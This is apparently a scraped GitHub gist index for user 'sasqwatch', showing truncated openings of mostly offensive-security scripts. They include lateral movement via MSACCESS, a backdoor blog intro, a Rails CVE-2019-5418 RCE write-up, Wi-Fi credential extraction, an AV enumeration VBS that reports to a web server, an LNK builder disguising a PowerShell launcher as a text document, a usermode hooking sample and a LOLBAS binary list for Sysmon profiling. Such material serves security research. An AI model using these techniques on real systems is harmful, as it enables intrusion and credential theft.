sasqwatch
  • Use curl to get the JSON response for the latest release
  • Use grep to find the line containing file URL
  • Use cut and tr to extract the URL
  • Use wget to download it
# Fetch the latest-release metadata, pick the .deb asset URL and download it
curl -s https://api.github.com/repos/jgm/pandoc/releases/latest \
| grep "browser_download_url.*deb" \
| cut -d : -f 2,3 \
| tr -d \" \
| wget -qi -
<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#
sasqwatch / blog.txt
Created March 26, 2019 23:27
Gist Blog - Inside Out, Simple backdoors
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a firewall, NAT and VPN.
In this example we will use three tools.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full, compact, custom version, I will not release it.
sasqwatch / CVE-2019-5418_is_RCE.md
Created March 21, 2019 17:34 — forked from mala/CVE-2019-5418_is_RCE.md
Rails' CVE-2019-5418 is RCE (Remote code execution)

Preface

  • This is an article I wrote on a day off, and it has no relation whatsoever to the organization I belong to.

Overview

  • CVE-2019-5418 is in practice very likely an RCE, yet it was announced under the unfamiliar name "File Content Disclosure", with CVE-2019-5419 described as enabling DoS.
  • Well, how to disclose a vulnerability is genuinely a hard problem; for a vulnerability in software that is widely used and whose impact would be enormous, I fully understand why many people say not to publish concrete attack code.
  • However, even the description of the scope of impact is inaccurate. I think this is a bad trend. Is this the result of careful consideration, or the result of ignorance?
sasqwatch / InterfaceTree.psm1
Created March 15, 2019 21:04 — forked from Cirzen/InterfaceTree.psm1
Get InterfaceTree module
function Get-InterfaceTree
{
<#
.SYNOPSIS
Displays a tree of interfaces for a given type
.DESCRIPTION
Recursively runs the GetInterfaces() method on a type and its interfaces to build a picture of all the interfaces that are applied to a type
.EXAMPLE
PS C:\> Get-InterfaceTree hashtable
sasqwatch / Extract-WiFi-Creds.ps1
Created February 13, 2019 09:35 — forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
sasqwatch / enumAV.vbs
Created February 13, 2019 09:34 — forked from leoloobeek/enumAV.vbs
Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
Function Base64Encode(sText)
dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.NodeTypedValue = sText
Base64Encode = EL.Text
End Function
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct")
sasqwatch / LNK-creator.ps1
Created February 13, 2019 09:34 — forked from leoloobeek/LNK-creator.ps1
Create LNK file
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk")
$ShortCut.Arguments = " -W 1 -command ....."
$ShortCut.TargetPath = "powershell"
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0";
$ShortCut.Description = "Type: Text Document";
$ShortCut.Save()
sasqwatch / Injectable.cpp
Created February 13, 2019 09:34 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
sasqwatch / sysmon_lolbas_profiler.ps1
Created February 13, 2019 09:31 — forked from leoloobeek/sysmon_lolbas_profiler.ps1
Profile Sysmon logs to discover which LOLBAS binaries have run and what their command-line arguments were
#https://github.com/LOLBAS-Project/LOLBAS
$lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdep